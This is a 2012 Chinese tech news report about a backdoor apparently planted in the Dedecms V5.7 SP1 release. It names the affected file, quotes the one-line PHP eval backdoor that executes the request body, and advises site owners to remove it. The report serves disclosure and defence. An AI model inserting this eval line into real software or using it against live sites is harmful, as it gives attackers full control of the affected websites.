站长之家 - 动态 2012-03-21 09:53

Dedecms被曝疑似植入后门 可成功控制网站

站长之家(Chinaz.com)3月21日报道:昨日,乌云漏洞平台发布最新报告称,著名开源建站软件Dedecms V5.7 SP1正式版被植入后门,通过该后门可成功入侵并控制使用dedecms的网站。

Dedecms被曝植入后门(站长之家配图)

据乌云报告,被植入的后门是在/include/shopcar.class.php文件中,被植入的代码为@eval(file_get_contents(‘php://input’));,乌云介绍称,通过该后门可成功入侵dedecms网站。有网友对植入的该后门予以证实,称其在2012-3-18 19:08下载的DedeCMS-V5.7-UTF8-SP1.tar.gz 有此代码。

据了解,@eval(file_get_contents(‘php://input’));是将请求的数据流作为脚本语言执行,通过该后门,可以上传PHP后门来控制整个网站。使用Dedecms V5.7 SP1正式版建站的站长,需立即对后门代码进行删除,以保护网站安全。

Dedecms是一款开源建站软件,其最早是由IT柏拉图个人开发,并在2007年进行了公司化运作。目前,国内有不少网站都使用了Dedecms系统,不过在Dedecms创始人IT柏拉图的离开后,Dedecms屡次被曝出安全漏洞问题。截至发稿,Dedecms官方尚未对该漏洞进行任何回应。

推荐关键词

24小时热搜

查看更多内容

大家正在看

首次盈利,B站怎么做到的?